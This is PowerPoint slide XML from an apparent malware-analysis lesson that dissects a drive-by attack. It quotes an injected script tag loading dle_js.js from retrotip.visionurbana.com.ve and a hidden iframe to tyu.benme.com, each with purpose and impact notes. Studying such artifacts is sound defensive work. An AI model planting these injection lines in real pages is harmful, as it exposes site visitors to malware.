                  <a:srgbClr val="ECECEC"/>
                </a:solidFill>
                <a:latin typeface="ui-sans-serif"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2940"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:ea typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:cs typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:sym typeface="Canva Sans" panose="020B0503030501040103"/>
              </a:rPr>
              <a:t>   </a:t>
            </a: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p:txBody>
      </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b="10981"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10139425" y="4324445"/>
            <a:ext cx="7467600" cy="5683660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13"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Task:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Open the file in a text editor to identify malicious components.</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The webpage initiates a </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>drive-by attack</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> that led to the exploit.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203261"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square"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347449" y="1104900"/>
            <a:ext cx="8262995" cy="13049726"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="7215"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="33CCFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Examine Exploit Artifacts</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="6000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="33CCFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:sym typeface="Bebas Neue Cyrillic" panose="02000506000000020004"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>we find the two places in the webpage that are part of the drive-by attack that started the exploit.</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="2800" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="ar-EG" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="ar-EG" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Identifying Exploit in HTML (Head Section)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="ECECEC"/>
                </a:solidFill>
                <a:latin typeface="ui-sans-serif"/>
              </a:rPr>
              <a:t>Script Tag:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="3200" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DF3079"/>
                </a:solidFill>
              </a:rPr>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A67D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A67D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A67D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DF3079"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A67D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"//retrotip.visionurbana.com.ve/engine/classes/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A67D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A67D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/dle_js.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;&lt;/script&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="ECECEC"/>
                </a:solidFill>
                <a:latin typeface="ui-sans-serif"/>
              </a:rPr>
              <a:t>Purpose:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="ECECEC"/>
                </a:solidFill>
                <a:latin typeface="ui-sans-serif"/>
              </a:rPr>
              <a:t> Loads malicious JavaScript (dle_js.js) from a       remote server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="ECECEC"/>
                </a:solidFill>
                <a:latin typeface="ui-sans-serif"/>
              </a:rPr>
              <a:t> - Impact:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="ECECEC"/>
                </a:solidFill>
                <a:latin typeface="ui-sans-serif"/>
              </a:rPr>
              <a:t> Executes JavaScript code to begin the exploit process.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="2800" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>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6910" y="1977963"/>
            <a:ext cx="9281884" cy="7743403"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25" name="Straight Arrow Connector 24"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="17318634" y="4305300"/>
            <a:ext cx="590606" cy="625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Loads malicious JavaScript (</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>dle_js.js</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>) from a remote server.</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Impact:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Executes JavaScript code to begin the exploit process. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Rectangle 2"/>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Loads malicious JavaScript (</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>dle_js.js</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>) from a remote server.</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Impact:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Executes JavaScript code to begin the exploit process. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="3048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Loads malicious JavaScript (</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>dle_js.js</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>) from a remote server.</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Impact:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Executes JavaScript code to begin the exploit process. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="4572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Loads malicious JavaScript (</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>dle_js.js</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>) from a remote server.</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Impact:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Executes JavaScript code to begin the exploit process.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166915" y="1104900"/>
            <a:ext cx="8653293" cy="12372618"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="7215"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="33CCFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Examine Exploit Artifacts</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="6600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="33CCFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:lnSpc>
                <a:spcPts val="7215"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Identifying Exploit in HTML (Body Section)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="ECECEC"/>
                </a:solidFill>
                <a:latin typeface="ui-sans-serif"/>
              </a:rPr>
              <a:t> - Iframe Element</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="ECECEC"/>
                </a:solidFill>
                <a:latin typeface="ui-sans-serif"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="ui-monospace"/>
              </a:rPr>
              <a:t>&lt;iframe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DF3079"/>
                </a:solidFill>
                <a:latin typeface="ui-monospace"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="ui-monospace"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A67D"/>
                </a:solidFill>
                <a:latin typeface="ui-monospace"/>
              </a:rPr>
              <a:t>"https://tyu.benme.com"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="ui-monospace"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DF3079"/>
                </a:solidFill>
                <a:latin typeface="ui-monospace"/>
              </a:rPr>
              <a:t>width</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="ui-monospace"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A67D"/>
                </a:solidFill>
                <a:latin typeface="ui-monospace"/>
              </a:rPr>
              <a:t>"290"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="ui-monospace"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DF3079"/>
                </a:solidFill>
                <a:latin typeface="ui-monospace"/>
              </a:rPr>
              <a:t>height</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="ui-monospace"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A67D"/>
                </a:solidFill>
                <a:latin typeface="ui-monospace"/>
              </a:rPr>
              <a:t>"257"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="ui-monospace"/>
              </a:rPr>
              <a:t>&gt;&lt;/iframe&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="ECECEC"/>
              </a:solidFill>
              <a:latin typeface="ui-sans-serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="ECECEC"/>
              </a:solidFill>
              <a:latin typeface="ui-sans-serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="ECECEC"/>
                </a:solidFill>
                <a:latin typeface="ui-sans-serif"/>
              </a:rPr>
              <a:t>-Purpose:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="ECECEC"/>
                </a:solidFill>
                <a:latin typeface="ui-sans-serif"/>
              </a:rPr>
              <a:t> Embeds an external hidden iframe to a   malicious server (tyu.benme.com).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="ECECEC"/>
              </a:solidFill>
              <a:latin typeface="ui-sans-serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="ECECEC"/>
                </a:solidFill>
                <a:latin typeface="ui-sans-serif"/>
              </a:rPr>
              <a:t> - Impact:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="ECECEC"/>
                </a:solidFill>
                <a:latin typeface="ui-sans-serif"/>
              </a:rPr>
              <a:t> Allows the attacker to load malicious content without the user’s knowledge</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="ECECEC"/>
              </a:solidFill>
              <a:latin typeface="ui-sans-serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="ECECEC"/>
              </a:solidFill>
              <a:latin typeface="ui-sans-serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="7215"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>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1633" y="1714500"/>
            <a:ext cx="9329452" cy="8124920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="Straight Arrow Connector 19"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="11811000" y="4762500"/>
            <a:ext cx="1524000" cy="457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chemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>&lt;iframe src="https://tyu.benme.com" width="290" height="257"&gt;&lt;/iframe&gt;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000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="33CCFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Examine Exploit Artifacts</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="6000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="33CCFF"/>
              </a:solidFill>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196538" y="3161454"/>
            <a:ext cx="17694195" cy="6132576"/>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3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:ea typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:cs typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:sym typeface="Canva Sans" panose="020B0503030501040103"/>
              </a:rPr>
              <a:t>When open the java script file  dle_js.js </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
